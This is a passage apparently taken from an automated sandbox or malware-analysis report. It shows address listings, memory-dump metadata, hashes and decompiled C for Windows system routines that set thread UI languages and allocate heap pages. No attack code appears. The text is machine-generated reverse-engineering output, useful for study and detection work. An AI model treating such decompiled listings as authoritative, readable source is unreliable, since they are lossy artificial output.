                                                                                                                          0x009ddc5e
                                                                                                                          0x009ddc61
                                                                                                                          0x009ddc64
                                                                                                                          0x009ddc67
                                                                                                                          0x009ddc67
                                                                                                                          0x009ddc6a
                                                                                                                          0x009ddc6c
                                                                                                                          0x009ddc8e
                                                                                                                          0x009ddc8e
                                                                                                                          0x009ddc91
                                                                                                                          0x009ddc93
                                                                                                                          0x009ddcce
                                                                                                                          0x009ddcce
                                                                                                                          0x009ddc95
                                                                                                                          0x009ddc9c
                                                                                                                          0x009ddc6e
                                                                                                                          0x009ddc72
                                                                                                                          0x009ddc75
                                                                                                                          0x009ddc77
                                                                                                                          0x009ddc79
                                                                                                                          0x00a2b551
                                                                                                                          0x00a2b551
                                                                                                                          0x00000000
                                                                                                                          0x009ddc7f
                                                                                                                          0x009ddc7f
                                                                                                                          0x009ddc81
                                                                                                                          0x00000000
                                                                                                                          0x009ddc83
                                                                                                                          0x009ddc86
                                                                                                                          0x009ddc88
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ddc88
                                                                                                                          0x009ddc81
                                                                                                                          0x009ddc79
                                                                                                                          0x009ddc6c
                                                                                                                          0x009ddc55
                                                                                                                          0x009ddc47
                                                                                                                          0x009ddc43
                                                                                                                          0x00000000
                                                                                                                          0x009ddc36
                                                                                                                          0x009ddc23
                                                                                                                          0x00000000
                                                                                                                          0x009ddbff
                                                                                                                          0x009ddbf1
                                                                                                                          0x009ddbdf
                                                                                                                          0x009ddb8f
                                                                                                                          0x009ddb92
                                                                                                                          0x009ddb95
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ddb95
                                                                                                                          0x009ddb8d
                                                                                                                          0x009ddb85
                                                                                                                          0x009ddb74
                                                                                                                          0x009ddc9f
                                                                                                                          0x009ddca2
                                                                                                                          0x009ddcb0
                                                                                                                          0x009ddcb0
                                                                                                                          0x009ddad1
                                                                                                                          0x00a2b4e5
                                                                                                                          0x00a2b4c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009dd831
                                                                                                                          0x00000000
                                                                                                                          0x009dd800
                                                                                                                          0x00a2b47f
                                                                                                                          0x00a2b485
                                                                                                                          0x00000000
                                                                                                                          0x00a2b485
                                                                                                                          0x009dd665
                                                                                                                          0x009dd652
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0D$0+D
                                                                                                                          • API String ID: 0-4146248415
                                                                                                                          • Opcode ID: d6ddf3ad52def3b137565e84568d8a611952db18357afbf7f969655f7afd8528
                                                                                                                          • Instruction ID: d5152e2c288b1e139bd89b35733244b2764c5654ba232aec33dc69d898da0aaa
                                                                                                                          • Opcode Fuzzy Hash: d6ddf3ad52def3b137565e84568d8a611952db18357afbf7f969655f7afd8528
                                                                                                                          • Instruction Fuzzy Hash: 2FE1F670A42359CFDB24DF28C980BA9B7B5BF85304F1481EAE9099B392D774AD81CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009FFAB0, Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E009FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E009DEEF0(0xab7b60);
					_t134 =  *0xab7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xab7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xab7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E009D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E009D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00A68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E009CB150();
													}
													_t116 = E00A66D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E009D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xab8638; // 0x0
																	_t122 = L009D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E009D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E009D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L009FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L009D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E009FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E009FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E009FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E009FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E009FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xab7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xab7b84 = _t75;
						_t73 = E009DEB70(_t134, 0xab7b60);
						if( *0xab7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E009DFF60( *0xab7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                          0x009ffab0
                                                                                                                          0x009ffab2
                                                                                                                          0x009ffab3
                                                                                                                          0x009ffab4
                                                                                                                          0x009ffabc
                                                                                                                          0x009ffac0
                                                                                                                          0x009ffb14
                                                                                                                          0x009ffb17
                                                                                                                          0x009ffac2
                                                                                                                          0x009ffac8
                                                                                                                          0x009ffacd
                                                                                                                          0x009ffad3
                                                                                                                          0x009ffad3
                                                                                                                          0x009ffadd
                                                                                                                          0x009ffb18
                                                                                                                          0x009ffb1b
                                                                                                                          0x009ffb1d
                                                                                                                          0x009ffb1e
                                                                                                                          0x009ffb1f
                                                                                                                          0x009ffb20
                                                                                                                          0x009ffb21
                                                                                                                          0x009ffb22
                                                                                                                          0x009ffb23
                                                                                                                          0x009ffb24
                                                                                                                          0x009ffb25
                                                                                                                          0x009ffb26
                                                                                                                          0x009ffb27
                                                                                                                          0x009ffb28
                                                                                                                          0x009ffb29
                                                                                                                          0x009ffb2a
                                                                                                                          0x009ffb2b
                                                                                                                          0x009ffb2c
                                                                                                                          0x009ffb2d
                                                                                                                          0x009ffb2e
                                                                                                                          0x009ffb2f
                                                                                                                          0x009ffb3a
                                                                                                                          0x009ffb3b
                                                                                                                          0x009ffb3e
                                                                                                                          0x009ffb41
                                                                                                                          0x009ffb44
                                                                                                                          0x009ffb47
                                                                                                                          0x009ffb4a
                                                                                                                          0x009ffb4d
                                                                                                                          0x009ffb53
                                                                                                                          0x00a3bdcb
                                                                                                                          0x00a3bdcb
                                                                                                                          0x009ffb59
                                                                                                                          0x009ffb5b
                                                                                                                          0x009ffb5b
                                                                                                                          0x009ffb5e
                                                                                                                          0x00a3bdd5
                                                                                                                          0x00a3bdd8
                                                                                                                          0x00000000
                                                                                                                          0x00a3bdda
                                                                                                                          0x00000000
                                                                                                                          0x00a3bdda
                                                                                                                          0x009ffb64
                                                                                                                          0x009ffb64
                                                                                                                          0x009ffb64
                                                                                                                          0x009ffb67
                                                                                                                          0x009ffb6e
                                                                                                                          0x009ffb70
                                                                                                                          0x009ffb72
                                                                                                                          0x00000000
                                                                                                                          0x009ffb78
                                                                                                                          0x009ffb7a
                                                                                                                          0x009ffb7a
                                                                                                                          0x009ffb7d
                                                                                                                          0x009ffb80
                                                                                                                          0x00a3bddf
                                                                                                                          0x00a3bde1
                                                                                                                          0x00000000
                                                                                                                          0x00a3bde3
                                                                                                                          0x00000000
                                                                                                                          0x00a3bde3
                                                                                                                          0x009ffb86
                                                                                                                          0x009ffb86
                                                                                                                          0x009ffb86
                                                                                                                          0x009ffb8b
                                                                                                                          0x009ffb90
                                                                                                                          0x009ffb92
                                                                                                                          0x009ffb94
                                                                                                                          0x009ffb9a
                                                                                                                          0x009ffb9b
                                                                                                                          0x009ffba1
                                                                                                                          0x00a3bde8
                                                                                                                          0x00a3bdeb
                                                                                                                          0x00a3bded
                                                                                                                          0x00a3beb5
                                                                                                                          0x00a3beb5
                                                                                                                          0x00a3bebb
                                                                                                                          0x00a3bebd
                                                                                                                          0x00a3bec3
                                                                                                                          0x00a3bed2
                                                                                                                          0x00a3bedd
                                                                                                                          0x00a3bedd
                                                                                                                          0x00a3beed
                                                                                                                          0x00000000
                                                                                                                          0x00a3bdf3
                                                                                                                          0x00a3bdfe
                                                                                                                          0x00a3be06
                                                                                                                          0x00a3be0b
                                                                                                                          0x00a3be0d
                                                                                                                          0x00a3be0f
                                                                                                                          0x00a3be14
                                                                                                                          0x00a3be19
                                                                                                                          0x00a3be20
                                                                                                                          0x00a3be25
                                                                                                                          0x00a3be27
                                                                                                                          0x00a3be35
                                                                                                                          0x00a3be39
                                                                                                                          0x00a3be46
                                                                                                                          0x00a3be4f
                                                                                                                          0x00a3be54
                                                                                                                          0x00a3be56
                                                                                                                          0x00a3bef8
                                                                                                                          0x00a3bef8
                                                                                                                          0x00000000
                                                                                                                          0x00a3be5c
                                                                                                                          0x00a3be5c
                                                                                                                          0x00a3be60
                                                                                                                          0x00000000
                                                                                                                          0x00a3be66
                                                                                                                          0x00a3be66
                                                                                                                          0x00a3be7f
                                                                                                                          0x00a3be84
                                                                                                                          0x00a3be87
                                                                                                                          0x00a3be89
                                                                                                                          0x00a3be8b
                                                                                                                          0x00a3be99
                                                                                                                          0x00a3be9d
                                                                                                                          0x00a3bea0
                                                                                                                          0x00a3beac
                                                                                                                          0x00a3beaf
                                                                                                                          0x00a3beb1
                                                                                                                          0x00a3beb3
                                                                                                                          0x00a3beb3
                                                                                                                          0x00000000
                                                                                                                          0x00a3bea2
                                                                                                                          0x00a3bea2
                                                                                                                          0x00000000
                                                                                                                          0x00a3bea2
                                                                                                                          0x00a3be8d
                                                                                                                          0x00a3be8d
                                                                                                                          0x00a3be92
                                                                                                                          0x00000000
                                                                                                                          0x00a3be92
                                                                                                                          0x00a3be8b
                                                                                                                          0x00a3be60
                                                                                                                          0x00a3be3b
                                                                                                                          0x00a3be3b
                                                                                                                          0x00a3be3e
                                                                                                                          0x00000000
                                                                                                                          0x00a3be40
                                                                                                                          0x00a3be40
                                                                                                                          0x00a3be44
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3be44
                                                                                                                          0x00a3be3e
                                                                                                                          0x00a3be29
                                                                                                                          0x00a3be29
                                                                                                                          0x00000000
                                                                                                                          0x00a3be29
                                                                                                                          0x00a3be27
                                                                                                                          0x00000000
                                                                                                                          0x009ffba7
                                                                                                                          0x009ffba7
                                                                                                                          0x009ffbab
                                                                                                                          0x00a3bf02
                                                                                                                          0x009ffbb1
                                                                                                                          0x009ffbb1
                                                                                                                          0x009ffbb8
                                                                                                                          0x009ffbbd
                                                                                                                          0x009ffbbd
                                                                                                                          0x009ffbbf
                                                                                                                          0x009ffbbf
                                                                                                                          0x009ffbc5
                                                                                                                          0x009ffbcb
                                                                                                                          0x009ffbf8
                                                                                                                          0x009ffbf8
                                                                                                                          0x009ffbfa
                                                                                                                          0x00000000
                                                                                                                          0x009ffc00
                                                                                                                          0x009ffc00
                                                                                                                          0x009ffc03
                                                                                                                          0x00000000
                                                                                                                          0x009ffc09
                                                                                                                          0x009ffc09
                                                                                                                          0x009ffc0f
                                                                                                                          0x009ffc15
                                                                                                                          0x009ffc23
                                                                                                                          0x009ffc23
                                                                                                                          0x009ffc25
                                                                                                                          0x009ffc27
                                                                                                                          0x009ffc75
                                                                                                                          0x009ffc7c
                                                                                                                          0x009ffc84
                                                                                                                          0x00000000
                                                                                                                          0x009ffc29
                                                                                                                          0x009ffc29
                                                                                                                          0x009ffc2d
                                                                                                                          0x009ffc30
                                                                                                                          0x00a3bf0f
                                                                                                                          0x00000000
                                                                                                                          0x009ffc36
                                                                                                                          0x009ffc38
                                                                                                                          0x009ffc3b
                                                                                                                          0x009ffc41
                                                                                                                          0x00a3bf17
                                                                                                                          0x00a3bf19
                                                                                                                          0x00a3bf48
                                                                                                                          0x00a3bf4b
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf1b
                                                                                                                          0x00a3bf22
                                                                                                                          0x00a3bf24
                                                                                                                          0x00a3bf26
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf2c
                                                                                                                          0x00a3bf37
                                                                                                                          0x00a3bf39
                                                                                                                          0x00a3bf3b
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf41
                                                                                                                          0x00a3bf45
                                                                                                                          0x00000000
                                                                                                                          0x00a3bf45
                                                                                                                          0x00a3bf3b
                                                                                                                          0x00a3bf26
                                                                                                                          0x00000000
                                                                                                                          0x009ffc47
                                                                                                                          0x009ffc47
                                                                                                                          0x009ffc49
                                                                                                                          0x009ffcb2
                                                                                                                          0x009ffcb4
                                                                                                                          0x009ffcb6
                                                                                                                          0x009ffcdc
                                                                                                                          0x009ffcdc
                                                                                                                          0x00000000
                                                                                                                          0x009ffcb8
                                                                                                                          0x009ffcc3
                                                                                                                          0x009ffcc5
                                                                                                                          0x009ffcc7
                                                                                                                          0x00000000
                                                                                                                          0x009ffcc9
                                                                                                                          0x009ffcc9
                                                                                                                          0x009ffccd
                                                                                                                          0x00000000
                                                                                                                          0x009ffccd
                                                                                                                          0x009ffcc7
                                                                                                                          0x00000000
                                                                                                                          0x009ffc4b
                                                                                                                          0x009ffc4b
                                                                                                                          0x009ffc4e
                                                                                                                          0x009ffc4e
                                                                                                                          0x009ffc51
                                                                                                                          0x009ffc51
                                                                                                                          0x009ffc54
                                                                                                                          0x009ffc5a
                                                                                                                          0x009ffc5c
                                                                                                                          0x009ffc5f
                                                                                                                          0x009ffc61
                                                                                                                          0x009ffc63
                                                                                                                          0x009ffc65
                                                                                                                          0x009ffc67
                                                                                                                          0x009ffc6e
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc72
                                                                                                                          0x009ffc67
                                                                                                                          0x009ffc61
                                                                                                                          0x00000000
                                                                                                                          0x009ffc5a
                                                                                                                          0x009ffc49
                                                                                                                          0x009ffc41
                                                                                                                          0x009ffc30
                                                                                                                          0x009ffc27
                                                                                                                          0x009ffc03
                                                                                                                          0x009ffbcd
                                                                                                                          0x009ffbd3
                                                                                                                          0x009ffbd9
                                                                                                                          0x009ffbdc
                                                                                                                          0x009ffbde
                                                                                                                          0x009ffc99
                                                                                                                          0x009ffc9b
                                                                                                                          0x009ffc9d
                                                                                                                          0x009ffcd5
                                                                                                                          0x009ffcd5
                                                                                                                          0x009ffc89
                                                                                                                          0x009ffc89
                                                                                                                          0x00000000
                                                                                                                          0x009ffc9f
                                                                                                                          0x009ffc9f
                                                                                                                          0x009ffca3
                                                                                                                          0x00000000
                                                                                                                          0x009ffca3
                                                                                                                          0x00000000
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe4
                                                                                                                          0x009ffbe9
                                                                                                                          0x009ffbf2
                                                                                                                          0x00000000
                                                                                                                          0x009ffbf2
                                                                                                                          0x009ffbde
                                                                                                                          0x009ffbcb
                                                                                                                          0x009ffbab
                                                                                                                          0x009ffc8b
                                                                                                                          0x009ffc8b
                                                                                                                          0x009ffc8c
                                                                                                                          0x009ffb80
                                                                                                                          0x009ffb72
                                                                                                                          0x009ffb5e
                                                                                                                          0x009ffc8d
                                                                                                                          0x009ffc91
                                                                                                                          0x009ffadf
                                                                                                                          0x009ffadf
                                                                                                                          0x009ffae1
                                                                                                                          0x009ffae4
                                                                                                                          0x009ffae7
                                                                                                                          0x009ffaec
                                                                                                                          0x009ffaf8
                                                                                                                          0x009ffb00
                                                                                                                          0x009ffb07
                                                                                                                          0x009ffb0f
                                                                                                                          0x009ffb0f
                                                                                                                          0x009ffb07
                                                                                                                          0x00000000
                                                                                                                          0x009ffaf8
                                                                                                                          0x009ffadd

                                                                                                                          Strings
                                                                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A3BE0F
                                                                                                                          • x2D, xrefs: 009FFAF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$x2D
                                                                                                                          • API String ID: 0-969970170
                                                                                                                          • Opcode ID: 6481fc29d965f48c70217c37a096bc42a95a04bf21545a1d1721ed27c362c6c7
                                                                                                                          • Instruction ID: 4dd7c85e52363e78148a6d472a380a386183ce74d70f289129c622d1bc11b446
                                                                                                                          • Opcode Fuzzy Hash: 6481fc29d965f48c70217c37a096bc42a95a04bf21545a1d1721ed27c362c6c7
                                                                                                                          • Instruction Fuzzy Hash: 0DA1F371B0061D8BDB25DF68C860BBAB3A9AF84710F14457AFA56DB791EB34DC01CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A8E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E00A8E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00A8BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00A8BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00A8AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00A09730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00A8A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00A8A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00A09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00A8A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00A8A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E009E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E009DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E009DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E009E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00A7FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
